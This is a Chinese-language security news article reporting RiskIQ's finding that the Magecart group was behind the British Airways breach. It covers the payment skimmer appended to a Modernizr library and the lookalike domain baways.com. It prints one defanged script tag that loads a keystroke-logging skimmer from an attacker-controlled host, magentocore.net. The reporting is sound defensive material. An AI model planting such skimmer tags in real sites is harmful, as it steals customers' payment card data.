英国航空公司数据泄露事件幕后黑手MageCart黑客团队

  • A+
所属分类:网络安全新闻
阿里代金券


推广者专属福利,新客户无门槛领取总价值高达2775元代金券,每种代金券限量500张,先到先得。

RiskIQ的研究人员进行的调查显示,英国航空公司数据泄露事件的责任是一个被追踪为MageCart的犯罪团伙。
最近披露的英国航空公司数据泄露事件的负责人 是被追踪为MageCart的犯罪团伙。该集团自2015年以来一直活跃,并且许多电子商务网站遭到破坏,以窃取支付卡和其他敏感数据。

该小组在目标网站中注入一个撇渣器脚本来虹吸支付卡数据,一旦攻击者成功破坏了网站,它就会在HTML模板中添加嵌入的Javascript。下面是一个名为MagentoCore的示例脚本 。

  1. <script type="text/javascript" src="hxxps://magentocore.net/mage/mage.js"></script>

此 脚本 记录客户的击键并将其发送到受攻击者控制的服务器。

通常,黑客试图破坏可能允许他们访问大量网站的第三方功能。

根据安全公司RiskIQ的说法,MageCart小组对英国航空公司进行了有针对性的攻击,并使用该脚本的定制版本来保持警惕。

黑客使用专用基础设施来对这家航空公司进行特定攻击。

与我们过去看到的 Magecart 收油机一样,这种攻击是一种简单但具有高度针对性的方法,它不分青红皂白地抓住了这种形式。这个特殊的撇渣器非常适合英国航空公司的支付页面设置,它告诉我们攻击者仔细考虑如何定位这个站点,而不是盲目地注入常规的Magecart撇渣器。读取RiskIQ发布的分析。

这次袭击中使用的基础设施只是考虑到了英国航空公司,故意针对的脚本将与正常的支付处理融为一体,以避免被发现。我们在域名baways.com上看到了这方面的证据 以及丢弃服务器路径。

专家分析了网站加载的所有脚本,并搜索了最近的变化证据。

专家注意到Modernizr JavaScript库中的一些变化,攻击者在底部添加了一些代码行,以避免给脚本带来问题。JavaScript库于格林威治标准时间8月21日20:49修改。

恶意脚本是从英国航空公司网站上的行李认领信息页面加载的,攻击者添加的代码允许Modernizr将付款信息从客户发送到攻击者的服务器。

英国航空公司数据泄露事件幕后黑手MageCart黑客团队

该脚本允许攻击者从网站和移动应用程序中窃取用户的数据。

从英国航空公司窃取的数据以JSON的形式发送到baways.com上托管的服务器,该服务器类似于航空公司使用的合法域。

攻击者从Comodo购买了SSL证书,以避免引起怀疑。

该域名 位于89.47.162.248,位于罗马尼亚,实际上是位于立陶宛的名为Time4VPS的VPS提供商的一部分。演员还为服务器加载了SSL证书。有趣的是,他们决定使用Comodo的付费证书而不是免费的LetsEncrypt证书,这可能使它看起来像一个合法的服务器:继续RiskIQ。

目前还不清楚MageCart如何在英国航空公司网站上设法注入恶意代码。

正如我们在这次袭击中看到的那样, Magecart 建立了定制的,有针对性的基础设施,专门与英国航空公司的网站融为一体,尽可能避免被发现。虽然我们永远无法知道攻击者在英国航空公司服务器上的覆盖范围,但他们能够修改该站点的资源这一事实告诉我们访问权限很大,并且他们可能在攻击开始之前很久就已经开始访问关于面向网络的资产的脆弱性,这是一个明显的提醒。

CE安全网

发表评论

您必须登录才能发表评论!